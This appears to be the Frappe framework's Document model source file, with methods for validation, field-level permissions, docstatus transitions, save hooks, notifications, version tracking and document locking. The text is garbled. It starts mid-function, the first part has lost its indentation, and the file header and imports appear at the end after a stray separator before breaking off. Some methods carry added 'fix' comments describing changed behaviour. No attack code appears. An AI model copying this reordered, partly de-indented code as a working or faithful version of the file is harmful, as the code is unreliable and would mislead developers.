and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
	"""Collect all empty mandatory fields (parent + children) and raise
	`frappe.MandatoryError` listing them; no-op if `flags.ignore_mandatory`."""
	if self.flags.ignore_mandatory:
		return

	missing = self._get_missing_mandatory_fields()
	for d in self.get_all_children():
		missing.extend(d._get_missing_mandatory_fields())

	if not missing:
		return

	# surface one message per missing field before raising
	for fieldname, msg in missing:
		msgprint(msg)

	if frappe.flags.print_messages:
		print(self.as_json().encode("utf-8"))

	raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
		fields=", ".join((each[0] for each in missing)),
		doctype=self.doctype,
		name=self.name))
def _validate_links(self):
	"""Throw if any Link field in this document or its children points to a
	missing document, or (for submittable links) to a cancelled one.
	Skipped on cancel and when `flags.ignore_links` is set."""
	if self.flags.ignore_links or self._action == "cancel":
		return

	invalid_links, cancelled_links = self.get_invalid_links()

	for d in self.get_all_children():
		# result is a (invalid, cancelled) pair of lists
		result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
		invalid_links.extend(result[0])
		cancelled_links.extend(result[1])

	if invalid_links:
		msg = ", ".join((each[2] for each in invalid_links))
		frappe.throw(_("Could not find {0}").format(msg),
			frappe.LinkValidationError)

	if cancelled_links:
		msg = ", ".join((each[2] for each in cancelled_links))
		frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
			frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
	"""Returns all children documents from **Table** type fields in a list.

	:param parenttype: [optional] Return only the rows of the table field
		whose child DocType (`df.options`) matches. Returns an empty list
		when no table field matches.

	Fix: previously, when `parenttype` was given but no table field matched,
	the loop fell through and returned the children of *all* tables."""
	ret = []
	for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
		if parenttype:
			if df.options==parenttype:
				return self.get(df.fieldname)
			# filtering by parenttype: skip non-matching tables entirely
			continue
		value = self.get(df.fieldname)
		if isinstance(value, list):
			ret.extend(value)
	return ret
def run_method(self, method, *args, **kwargs):
	"""run standard triggers, plus those in hooks

	Executes `self.<method>` (if it exists) wrapped by `Document.hook`, so
	doc_events handlers from other apps run as well, then fires
	notifications, webhooks and server scripts for the event."""
	if "flags" in kwargs:
		del kwargs["flags"]

	if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
		fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
	else:
		# hack! to run hooks even if method does not exist
		fn = lambda self, *args, **kwargs: None

	# the hook composer looks up doc_events by the function's __name__
	fn.__name__ = str(method)
	out = Document.hook(fn)(self, *args, **kwargs)

	self.run_notifications(method)
	run_webhooks(self, method)
	run_server_script_for_doc_event(self, method)

	return out
def run_trigger(self, method, *args, **kwargs):
	"""Alias for `run_method`, kept for backward compatibility."""
	return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
	"""Run notifications for this method.

	Loads enabled Notification definitions for this doctype (cached under
	the 'notifications' cache key), then evaluates each alert whose event
	matches `method`. Alerts already evaluated during this save are skipped
	via `flags.notifications_executed`. Muted during import/patch/install."""
	if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
		return

	# idiom fix: `is None` instead of `== None` (PEP 8); behavior unchanged
	if self.flags.notifications_executed is None:
		self.flags.notifications_executed = []

	from frappe.email.doctype.notification.notification import evaluate_alert

	if self.flags.notifications is None:
		alerts = frappe.cache().hget('notifications', self.doctype)
		if alerts is None:
			alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
				filters={'enabled': 1, 'document_type': self.doctype})
			frappe.cache().hset('notifications', self.doctype, alerts)
		self.flags.notifications = alerts

	if not self.flags.notifications:
		return

	def _evaluate_alert(alert):
		# evaluate each alert at most once per document event cycle
		if alert.name not in self.flags.notifications_executed:
			evaluate_alert(self, alert.name, alert.event)
			self.flags.notifications_executed.append(alert.name)

	# maps controller method -> Notification "event" value
	event_map = {
		"on_update": "Save",
		"after_insert": "New",
		"on_submit": "Submit",
		"on_cancel": "Cancel"
	}

	if not self.flags.in_insert:
		# value change is not applicable in insert
		event_map['on_change'] = 'Value Change'

	for alert in self.flags.notifications:
		event = event_map.get(method, None)
		if event and alert.event == event:
			_evaluate_alert(alert)
		elif alert.event == 'Method' and method == alert.method:
			_evaluate_alert(alert)
# `whitelist` here is the staticmethod defined on this class; inside the
# class body it must be unwrapped via `.__func__` to be used as a decorator.
@whitelist.__func__
def _submit(self):
	"""Submit the document. Sets `docstatus` = 1, then saves."""
	self.docstatus = 1
	self.save()
# see note on _submit: staticmethod decorator used via .__func__ in class body
@whitelist.__func__
def _cancel(self):
	"""Cancel the document. Sets `docstatus` = 2, then saves."""
	self.docstatus = 2
	self.save()
@whitelist.__func__
def submit(self):
	"""Submit the document. Sets `docstatus` = 1, then saves.

	Public entry point; delegates to `_submit` so subclasses may override."""
	self._submit()
@whitelist.__func__
def cancel(self):
	"""Cancel the document. Sets `docstatus` = 2, then saves.

	Public entry point; delegates to `_cancel` so subclasses may override."""
	self._cancel()
def delete(self, ignore_permissions=False):
	"""Delete document from the database via `frappe.delete_doc`.

	:param ignore_permissions: skip permission checks if True."""
	frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
	"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:

	- `validate`, `before_save` for **Save**.
	- `validate`, `before_submit` for **Submit**.
	- `before_cancel` for **Cancel**
	- `before_update_after_submit` for **Update after Submit**

	Will also update title_field if set"""

	# snapshot the persisted doc so set-only-once / versioning can diff later
	self.load_doc_before_save()
	self.reset_seen()

	# before_validate method should be executed before ignoring validations
	if self._action in ("save", "submit"):
		self.run_method("before_validate")

	if self.flags.ignore_validate:
		return

	# _action was decided earlier by check_docstatus_transition
	if self._action=="save":
		self.run_method("validate")
		self.run_method("before_save")
	elif self._action=="submit":
		self.run_method("validate")
		self.run_method("before_submit")
	elif self._action=="cancel":
		self.run_method("before_cancel")
	elif self._action=="update_after_submit":
		self.run_method("before_update_after_submit")

	self.set_title_field()
def load_doc_before_save(self):
	"""Cache the persisted version of this document on `_doc_before_save`
	(None for new documents or when the record no longer exists)."""
	self._doc_before_save = None

	if self.is_new():
		return

	try:
		self._doc_before_save = frappe.get_doc(self.doctype, self.name)
	except frappe.DoesNotExistError:
		self._doc_before_save = None
		frappe.clear_last_message()
def run_post_save_methods(self):
	"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:

	- `on_update` for **Save**.
	- `on_update`, `on_submit` for **Submit**.
	- `on_cancel` for **Cancel**
	- `update_after_submit` for **Update after Submit**"""

	# NOTE(review): this local is never used below — presumably kept so the
	# snapshot is fetched before triggers run; verify before removing
	doc_before_save = self.get_doc_before_save()

	if self._action=="save":
		self.run_method("on_update")
	elif self._action=="submit":
		self.run_method("on_update")
		self.run_method("on_submit")
	elif self._action=="cancel":
		self.run_method("on_cancel")
		self.check_no_back_links_exist()
	elif self._action=="update_after_submit":
		self.run_method("on_update_after_submit")

	self.clear_cache()
	self.notify_update()
	update_global_search(self)
	self.save_version()

	self.run_method('on_change')

	if (self.doctype, self.name) in frappe.flags.currently_saving:
		frappe.flags.currently_saving.remove((self.doctype, self.name))

	# invalidate the cached "latest" copy
	self.latest = None
def clear_cache(self):
	"""Drop this document from the framework's document cache."""
	frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
	"""Clear _seen property and set current user as seen"""
	if getattr(self.meta, 'track_seen', False):
		# write directly, without bumping `modified`
		frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
	"""Publish realtime that the current document is modified"""
	if frappe.flags.in_patch: return

	frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
		doctype=self.doctype, docname=self.name, after_commit=True)

	# also refresh list views, except for read-only / single / child doctypes
	if not self.meta.get("read_only") and not self.meta.get("issingle") and \
		not self.meta.get("istable"):
		data = {
			"doctype": self.doctype,
			"name": self.name,
			"user": frappe.session.user
		}
		frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
	"""Set a value in the document object, update the timestamp and update the database.

	WARNING: This method does not trigger controller validations and should
	be used very carefully.

	:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
	:param value: value of the property to be updated
	:param update_modified: default True. updates the `modified` and `modified_by` properties
	:param notify: default False. run doc.notify_updated() to send updates via socketio
	:param commit: default False. run frappe.db.commit()
	"""
	if isinstance(fieldname, dict):
		self.update(fieldname)
	else:
		self.set(fieldname, value)

	if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
		# don't update modified timestamp if called from post save methods
		# like on_update or on_submit
		self.set("modified", now())
		self.set("modified_by", frappe.session.user)

	self.load_doc_before_save()
	# to trigger notification on value change
	self.run_method('before_change')
	frappe.db.set_value(self.doctype, self.name, fieldname, value,
		self.modified, self.modified_by, update_modified=update_modified)

	self.run_method('on_change')

	if notify:
		self.notify_update()

	self.clear_cache()
	if commit:
		frappe.db.commit()
def db_get(self, fieldname):
	"""get database value for this fieldname (bypasses the in-memory doc)"""
	return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
	"""Check if document links to any active document before Cancel.

	Raises via the delete_doc link-checkers; skipped with `flags.ignore_links`."""
	from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
	if not self.flags.ignore_links:
		check_if_doc_is_linked(self, method="Cancel")
		check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
	"""Save version info

	Creates a Version document diffing `_doc_before_save` against the
	current state (or a for-insert record when there is no prior state)."""

	# don't track version under following conditions
	if (not getattr(self.meta, 'track_changes', False)
		or self.doctype == 'Version'
		or self.flags.ignore_version
		or frappe.flags.in_install
		or (not self._doc_before_save and frappe.flags.in_patch)):
		return

	version = frappe.new_doc('Version')
	if not self._doc_before_save:
		version.for_insert(self)
		version.insert(ignore_permissions=True)
	elif version.set_diff(self._doc_before_save, self):
		# set_diff returns truthy only when something actually changed
		version.insert(ignore_permissions=True)
		if not frappe.flags.in_migrate:
			# follow since you made a change?
			follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
	"""Decorator: Make method `hookable` (i.e. extensible by another app).

	Note: If each hooked method returns a value (dict), then all returns are
	collated in one dict and returned. Ideally, don't return values in hookable
	methods, set properties in the document."""
	def add_to_return_value(self, new_return_value):
		# dict returns are merged together; other truthy returns replace
		# the accumulated value
		if isinstance(new_return_value, dict):
			if not self.get("_return_value"):
				self._return_value = {}
			self._return_value.update(new_return_value)
		else:
			self._return_value = new_return_value or self.get("_return_value")

	def compose(fn, *hooks):
		# build a runner that calls the original fn first, then each hook,
		# folding every return into self._return_value
		def runner(self, method, *args, **kwargs):
			add_to_return_value(self, fn(self, *args, **kwargs))
			for f in hooks:
				add_to_return_value(self, f(self, method, *args, **kwargs))

			return self._return_value

		return runner

	def composer(self, *args, **kwargs):
		hooks = []
		method = f.__name__
		# doc_events hooks registered for this doctype and for "*"
		doc_events = frappe.get_doc_hooks()
		for handler in doc_events.get(self.doctype, {}).get(method, []) \
			+ doc_events.get("*", {}).get(method, []):
			hooks.append(frappe.get_attr(handler))

		composed = compose(f, *hooks)
		return composed(self, method, *args, **kwargs)

	return composer
def is_whitelisted(self, method):
	"""Raise `NotFound` if `method` does not exist on this document, or
	`Forbidden` if it exists but is not whitelisted for remote calls."""
	fn = getattr(self, method, None)
	if not fn:
		raise NotFound("Method {0} not found".format(method))
	elif not getattr(fn, "whitelisted", False):
		raise Forbidden("Method {0} not whitelisted".format(method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
	"""Check that value of fieldname should be 'condition' val2
	else throw Exception.

	:param condition: comparison operator understood by `frappe.compare`
		(e.g. "=", "in", "not in", "^")
	:param doc: [optional] document to check; defaults to self
	:param raise_exception: exception class to raise on failure (True raises
		the default ValidationError)"""
	error_condition_map = {
		"in": _("one of"),
		"not in": _("none of"),
		"^": _("beginning with"),
	}

	if not doc:
		doc = self

	val1 = doc.get_value(fieldname)

	df = doc.meta.get_field(fieldname)
	# cast the comparison value to the field's type before comparing
	val2 = doc.cast(val2, df)

	if not frappe.compare(val1, condition, val2):
		label = doc.meta.get_label(fieldname)
		condition_str = error_condition_map.get(condition, condition)
		if doc.parentfield:
			msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
		else:
			msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)

		# raise passed exception or True
		msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
	"""Raise exception if Table field is empty."""
	rows = self.get(parentfield)
	if isinstance(rows, list) and len(rows) > 0:
		return

	label = self.meta.get_label(parentfield)
	frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
	"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.

	:param doc: Document whose numeric properties are to be rounded.
	:param fieldnames: [Optional] List of fields to be rounded."""
	if not fieldnames:
		# default: every numeric field defined in the doc's meta
		fieldnames = (df.fieldname for df in
			doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))

	for fieldname in fieldnames:
		# precision is resolved per-field (and per parentfield for child rows)
		doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
	"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
	return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
	"""Add a comment to this document.

	:param comment_type: e.g. `Comment`. See Communication for more info.
	:param text: comment body; defaults to the comment_type string
	:param comment_email: attributed email; defaults to the session user
	:param link_doctype/link_name: [optional] linked reference
	:returns: the inserted Comment document"""
	out = frappe.get_doc({
		"doctype":"Comment",
		'comment_type': comment_type,
		"comment_email": comment_email or frappe.session.user,
		"comment_by": comment_by,
		"reference_doctype": self.doctype,
		"reference_name": self.name,
		"content": text or comment_type,
		"link_doctype": link_doctype,
		"link_name": link_name
	}).insert(ignore_permissions=True)
	return out
def add_seen(self, user=None):
	"""add the given/current user to list of users who have seen this document (_seen)"""
	if not user:
		user = frappe.session.user

	if self.meta.track_seen:
		_seen = self.get('_seen') or []
		# _seen is stored as a JSON-encoded list
		_seen = frappe.parse_json(_seen)

		if user not in _seen:
			_seen.append(user)
			# direct write; intentionally does not bump `modified`
			frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
			frappe.local.flags.commit = True
def add_viewed(self, user=None):
	"""add log to communication when a user views a document

	:param user: user who viewed the document; defaults to the session user"""
	if not user:
		user = frappe.session.user

	if hasattr(self.meta, 'track_views') and self.meta.track_views:
		frappe.get_doc({
			"doctype": "View Log",
			# fix: record the `user` argument — previously frappe.session.user
			# was hard-coded here, silently ignoring the parameter
			"viewed_by": user,
			"reference_doctype": self.doctype,
			"reference_name": self.name,
		}).insert(ignore_permissions=True)
		frappe.local.flags.commit = True
def get_signature(self):
	"""Returns signature (hash) for private URL.

	SHA-224 of the creation timestamp; also used as the lock-file name."""
	return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
	"""Return the list of users who liked this document (from `_liked_by`)."""
	raw = getattr(self, "_liked_by", None)
	return json.loads(raw) if raw else []
def set_onload(self, key, value):
	"""Store a key on the transient `__onload` dict (created lazily)."""
	if not self.get("__onload"):
		# first onload value: create the container
		self.set("__onload", frappe._dict())
	onload = self.get("__onload")
	onload[key] = value
def get_onload(self, key=None):
	"""Return the `__onload` dict, or a single value from it when `key` is given."""
	if key:
		return self.get('__onload')[key]
	return self.get("__onload", frappe._dict())
def queue_action(self, action, **kwargs):
	"""Run an action in background. If the action has an inner function,
	like _submit for submit, it will call that instead

	Raises if the document is already queued (lock file exists)."""
	# call _submit instead of submit, so you can override submit to call
	# run_delayed based on some action
	# See: Stock Reconciliation
	from frappe.utils.background_jobs import enqueue

	if hasattr(self, '_' + action):
		action = '_' + action

	if file_lock.lock_exists(self.get_signature()):
		frappe.throw(_('This document is currently queued for execution. Please try again'),
			title=_('Document Queued'))

	# lock now; execute_action unlocks in the worker
	self.lock()
	enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
		action=action, **kwargs)
def lock(self, timeout=None):
	"""Creates a lock file for the given document. If timeout is set,
	it will retry every 1 second for acquiring the lock again

	:param timeout: Timeout in seconds, default 0
	:raises frappe.DocumentLockedError: if the lock cannot be acquired"""
	signature = self.get_signature()
	if file_lock.lock_exists(signature):
		lock_exists = True
		if timeout:
			# poll once per second until the lock disappears or timeout expires
			for i in range(timeout):
				time.sleep(1)
				if not file_lock.lock_exists(signature):
					lock_exists = False
					break
		if lock_exists:
			raise frappe.DocumentLockedError
	file_lock.create_lock(signature)
def unlock(self):
	"""Delete the lock file for this document"""
	file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
	"""
	Generic validation to verify date sequence

	Throws `InvalidDates` when the to-date precedes the from-date.
	"""
	if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
		frappe.throw(_('{0} must be after {1}').format(
			frappe.bold(self.meta.get_label(to_date_field)),
			frappe.bold(self.meta.get_label(from_date_field)),
		), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
	"""Return the set of users with a non-cancelled ToDo assignment on this document."""
	assignments = frappe.get_all('ToDo',
		fields=['owner'],
		filters={
			'reference_type': self.doctype,
			'reference_name': self.name,
			'status': ('!=', 'Cancelled'),
		})
	return {assignment.owner for assignment in assignments}
def add_tag(self, tag):
	"""Add a Tag to this document"""
	from frappe.desk.doctype.tag.tag import DocTags
	DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
	"""Return a list of Tags attached to this document"""
	from frappe.desk.doctype.tag.tag import DocTags
	# stored as a comma-separated string with a leading separator; drop the
	# empty first element
	return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
	"""Execute an action on a document (called by background worker)

	Releases the queue lock first, then runs the action; on failure the
	transaction is rolled back and the error is attached as a comment."""
	doc = frappe.get_doc(doctype, name)
	doc.unlock()
	try:
		getattr(doc, action)(**kwargs)
	except Exception:
		frappe.db.rollback()

		# add a comment (?)
		if frappe.local.message_log:
			msg = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'

		doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
		doc.notify_update()
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint, is_whitelisted
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
	"""returns a frappe.model.Document object.

	:param arg1: Document dict or DocType name.
	:param arg2: [optional] document name.
	:param for_update: [optional] select document for update.

	There are multiple ways to call `get_doc`

		# will fetch the latest user object (with child table) from the database
		user = get_doc("User", "test@example.com")

		# create a new object
		user = get_doc({
			"doctype":"User"
			"email_id": "test@example.com",
			"roles: [
				{"role": "System Manager"}
			]
		})

		# create new object with keyword arguments
		user = get_doc(doctype='User', email_id='test@example.com')

		# select a document for update
		user = get_doc("User", "test@example.com", for_update=True)
	"""
	doctype = None  # robustness: avoid NameError when no doctype can be determined

	if args:
		if isinstance(args[0], BaseDocument):
			# already a document
			return args[0]
		elif isinstance(args[0], string_types):
			doctype = args[0]

		elif isinstance(args[0], dict):
			# passed a dict
